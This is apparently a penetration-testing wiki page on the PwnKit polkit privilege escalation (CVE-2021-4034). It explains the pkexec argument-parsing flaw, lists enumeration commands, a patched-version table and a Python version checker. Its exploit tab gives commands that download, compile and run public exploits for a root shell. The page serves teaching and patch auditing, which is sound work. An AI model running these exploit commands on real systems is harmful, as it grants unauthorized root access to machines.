# PwnKit

## Theory

CVE-2021-4034 (PwnKit) was discovered by researchers at [Qualys](https://www.qualys.com/). The vulnerability has existed in every version of the "Policy Toolkit" (Polkit) package **since it was first released in 2009** and allows any unprivileged local user to easily obtain full administrative access on any Linux machine with the Polkit package installed. **Polkit is installed by default on most Linux distributions**, making this vulnerability *extremely* widespread. The PwnKit vulnerability lives in the pkexec utility: the pkexec command lets authorized users execute commands with elevated privileges (much like sudo).

**Pkexec** attempts to parse any command-line arguments that we pass it using a for-loop, starting at the index 1 to offset the name of the program and obtain the first real argument. The name of the program is irrelevant to argument parsing, so the indexing is simply offset to ignore it. But if we don't provide any arguments, the index is permanently set to 1. This becomes a problem later when pkexec attempts to write to the value of the argument at index n. As there are no command-line arguments, there is no argument at index n — instead the program overwrites the next thing in memory, which just so happens to be the first value in the list of environment variables when the program is called using a C function called execve(). In other words, by passing pkexec a null list of arguments, we can **force it to overwrite an environment variable** instead! - [TryHackMe](https://tryhackme.com/room/pwnkit)

## Practice

{% tabs %}
{% tab title="Enumeration" %}
For the PwnKit exploit to work, the SUID bit must be set on the pkexec binary (it is by default, since pkexec needs root to do its job):

```bash
# Quote the glob so the shell does not expand it before find sees it
$ find / -type f -name '*pkexec*' -perm -4000 2>/dev/null
/usr/bin/pkexec
```

Check which polkit package version is installed, so it can be compared against the patched versions below:

```bash
# Debian/Ubuntu
apt list --installed | grep -i polkit

# RHEL/CentOS/Fedora/Oracle Linux (all RPM-based)
rpm -qa | grep -i polkit

# SUSE
zypper search -i polkit

# Solaris (SVR4 packaging; pkginfo does not exist on RPM-based Oracle Linux)
pkginfo | grep -i polkit
```

Here is a summary table of patched versions by OS. Any earlier version is vulnerable.

| OS version | Patched version |
| --- | --- |
| CentOS 7 | polkit-0.112-26.el7_9.1 |
| CentOS 8 | polkit-0.115-13.el8_5.1 |
| Debian 9 | policykit-1_0.105-18+deb9u2 |
| Debian 10 | policykit-1_0.105-25+deb10u1 |
| Debian 11 | policykit-1_0.105-31+deb11u1 |
| Oracle Linux 6 | polkit-0.96-11.0.1.el6_10.1 |
| Oracle Linux 7 | polkit-0.112-26.0.1.el7_9.1 |
| Oracle Linux 8 | polkit-0.115-13.0.1.el8_5.1 |
| SUSE Linux Enterprise Server 12 | polkit-debugsource-0.113-5.24.1 |
| SUSE Linux Enterprise Server 15 LTSS and SP1 | polkit-debugsource-0.116-3.6.1 |
| SUSE Linux Enterprise Server 15 SP2 | polkit-debugsource-0.114-3.15.1 |
| Red Hat 6 | polkit-0.96-11.el6_10.2 |
| Red Hat 7 | polkit-0.112-26.el7_9.1 |
| Red Hat 8 | polkit-0.115-13.el8_5.1 |
| Ubuntu 18.04 | policykit-1-0.105-20ubuntu0.18.04.6 |
| Ubuntu 20.04 | policykit-1-0.105-26ubuntu1.2 |
| Ubuntu 21.10 | policykit-1-0.105-31ubuntu0.1 |
| Fedora 34 | polkit-0.117-3.fc34.2 |
| Fedora 35 | polkit-0.120-1.fc35.1 |
| Anolis OS 7 | polkit-0.112-26.an7.1 |
| Anolis OS 8 | polkit-0.115-13.an8_5.1 |
| Alibaba Cloud Linux 2 | polkit-0.112-26.3.al7.1 |
| Alibaba Cloud Linux 3 | polkit-0.115-13.al8.1 |
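Comparing the output of the package commands above against this table by eye is error-prone, so here is an added helper (written for this page, not from any of the linked projects) that parses `apt list --installed` / `rpm -qa` lines, orders package versions with a simplified rpmvercmp-style comparison, and reports whether the installed polkit is older than the patched release. The `PATCHED` dictionary mirrors a subset of the table; the distro keys and sample lines are constructed for the example.

```python
import re

# Subset of the patched-version table above (package name stripped).
PATCHED = {
    "ubuntu-18.04": "0.105-20ubuntu0.18.04.6",
    "ubuntu-20.04": "0.105-26ubuntu1.2",
    "ubuntu-21.10": "0.105-31ubuntu0.1",
    "debian-10": "0.105-25+deb10u1",
    "debian-11": "0.105-31+deb11u1",
    "centos-7": "0.112-26.el7_9.1",
    "centos-8": "0.115-13.el8_5.1",
    "fedora-35": "0.120-1.fc35.1",
}
_SEG = re.compile(r"\d+|[A-Za-z]+")

def vercmp(a, b):
    """Simplified rpmvercmp ordering: split into numeric/alphabetic runs and
    compare run by run (numbers numerically, letters lexically, a number beats
    letters, more runs beat fewer). Returns -1, 0 or 1; no epoch/'~' support."""
    ra, rb = _SEG.findall(a), _SEG.findall(b)
    for x, y in zip(ra, rb):
        if x == y:
            continue
        if x.isdigit() and y.isdigit():
            return -1 if int(x) < int(y) else 1
        if x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1
        return -1 if x < y else 1
    return (len(ra) > len(rb)) - (len(ra) < len(rb))

def parse_installed(line):
    """Version from one line of 'apt list --installed' or 'rpm -qa' output;
    None for lines that are not the polkit package itself (e.g. polkit-libs)."""
    m = re.search(r"^policykit-1/\S+\s(\S+)\s", line)  # apt list format
    if not m:  # rpm -qa format: polkit-<version>-<release>.<arch>
        m = re.match(r"^polkit-(\d\S*?)\.(?:x86_64|aarch64|i686|noarch)$", line)
    return m.group(1) if m else None

def is_vulnerable(distro, installed_version):
    """True when the installed version sorts before the patched release."""
    return vercmp(installed_version, PATCHED[distro]) < 0

# Constructed sample lines, one per package-manager output format.
for distro, line in [("ubuntu-20.04", "policykit-1/focal-updates,now 0.105-26ubuntu1.1 amd64 [installed]"),
                     ("centos-8", "polkit-0.115-11.el8.x86_64")]:
    ver = parse_installed(line)
    print(distro, ver, "VULNERABLE" if is_vulnerable(distro, ver) else "patched")
```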
{% endtab %}

{% tab title="Exploit" %}
We can use [this exploit](https://github.com/ly4k/PwnKit) made by ly4k. It should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.

```bash
#Run the exploit
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit        # interactive shell
./PwnKit 'id'   # single command

# Or you may want to compile it by yourself
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
```

Alternatively, we can use [this exploit](https://github.com/arthepsy/CVE-2021-4034) made by arthepsy:

```bash
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc
```

{% endtab %}
{% endtabs %}

## Resources

{% embed url="https://ine.com/blog/exploiting-pwnkit-cve-20214034" %}

{% embed url="https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034" %}

{% embed url="https://tryhackme.com/room/pwnkit" %}

{% embed url="https://cyberwatch.fr/cve/cve-2021-4034/" %}
